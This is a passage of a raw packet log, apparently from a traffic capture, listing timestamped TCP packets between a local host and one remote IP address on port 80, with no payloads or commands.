                                                                                                                                                                    Jan 7, 2024 05:29:23.506817102 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.506877899 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.507006884 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.507061005 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.507194042 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.507328987 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.507369041 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.507437944 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.507529974 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.507574081 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.507617950 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.507716894 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.507761955 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.508009911 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.508069992 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.508110046 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.508167982 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.508234024 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.508275986 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.508326054 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.508413076 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.508455038 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.508537054 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.508620024 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.508660078 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.508716106 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.508830070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.508872986 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.508876085 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.509001970 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.509046078 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.509128094 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.509176970 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.509217978 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.509310961 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.509407043 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.509449005 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.509469032 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.509524107 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.509562969 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.509563923 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.509592056 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.509634018 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.509659052 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.509728909 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.509772062 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.509809017 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.509934902 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.509970903 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.509983063 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.510050058 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.510098934 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.510162115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.510260105 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.510301113 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.510344028 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.510449886 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.510487080 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.510565042 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.510653973 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.510694981 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.510720968 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.510823965 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.510860920 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.510888100 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.510952950 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.510991096 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.511028051 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.511080027 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.511185884 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.511213064 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.511327028 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.511368036 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.511436939 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.511506081 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.511538982 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.511569023 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.511624098 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.511662006 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.511723995 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.511800051 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.511837006 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.511863947 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.511936903 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.511970043 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.511996031 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.512317896 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.512358904 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.512387037 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.512449980 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.512490034 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.512566090 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.512654066 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.512687922 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.512769938 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.512898922 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.512952089 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.513011932 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.513066053 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.513113022 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.513149977 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.513163090 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.513211966 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.513262987 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.513303995 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.513349056 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.513495922 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.513557911 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.513595104 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.513657093 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.513719082 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.513731956 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.513758898 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.513806105 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.513844013 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.513912916 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.513993025 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.514029026 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.514142036 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.514250994 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.514301062 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.514347076 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.514425993 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.514460087 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.514507055 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.514586926 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.514624119 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.575963974 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.693274975 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.693314075 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.693368912 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.693631887 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.693717003 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.693753004 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.693860054 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.694093943 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.694134951 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.694163084 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.694283009 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.694317102 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.694359064 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.694453001 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.694497108 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.694539070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.694633007 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.694668055 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.694720984 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.694858074 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.694891930 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.694955111 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.695046902 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.695080996 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.695182085 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.695238113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.695271969 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.695746899 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.695842981 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.695903063 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.695903063 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.695976973 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.696016073 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.696077108 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.696187019 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.696224928 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.696280003 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.696346998 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.696382046 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.696453094 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.696583986 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.696616888 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.696753979 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.696846008 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.696882010 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.696954966 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.696997881 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.697033882 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.697112083 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.697168112 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.697201967 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.697257996 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.697360992 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.697406054 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.697453022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.697551012 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.697587967 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.697602034 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.697668076 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.697705984 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.697762012 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.697879076 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.697915077 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.697941065 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.698020935 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.698055029 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.698137999 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.698215008 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.698249102 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.698400974 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.698504925 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.698540926 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.698657990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.698731899 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.698765993 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.698810101 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.698940992 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.698975086 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.699044943 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.699139118 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.699178934 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.699258089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.699332952 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.699368954 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.699426889 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.699501991 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.699536085 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.699656963 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.699755907 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.699790001 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.699820995 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.699927092 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.699961901 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.700047016 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.700107098 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.700141907 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.700198889 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.700275898 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.700309992 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.700567961 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.700655937 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.700969934 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.701056957 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.701096058 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.703583956 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.703970909 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.704013109 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.704061985 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.704142094 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.704174995 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.704274893 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.704346895 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.704380989 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.704422951 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.704541922 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.704576015 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.704862118 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.704919100 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.704957962 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.705027103 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.705110073 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.705143929 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.705231905 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.705394983 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.705427885 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.705432892 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.705495119 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.705528975 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.705553055 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.705590963 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.705625057 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.705646038 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.705691099 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.705723047 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.705759048 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.705795050 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.705825090 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.705835104 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.705904007 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.705955029 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.705955982 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.706022024 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.706053972 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.706072092 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.706142902 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.706157923 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.706176043 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.706208944 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.706243038 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.706314087 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.706398964 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.706430912 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.706479073 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.706526041 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.706557035 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.706593990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.706650972 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.706684113 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.706726074 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.706816912 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.706855059 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.706995010 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.707083941 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.707143068 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.707422018 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.707530022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.707566977 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.707612038 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.707730055 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.707762003 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.707796097 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.707948923 CET804973591.215.85.120192.168.2.4
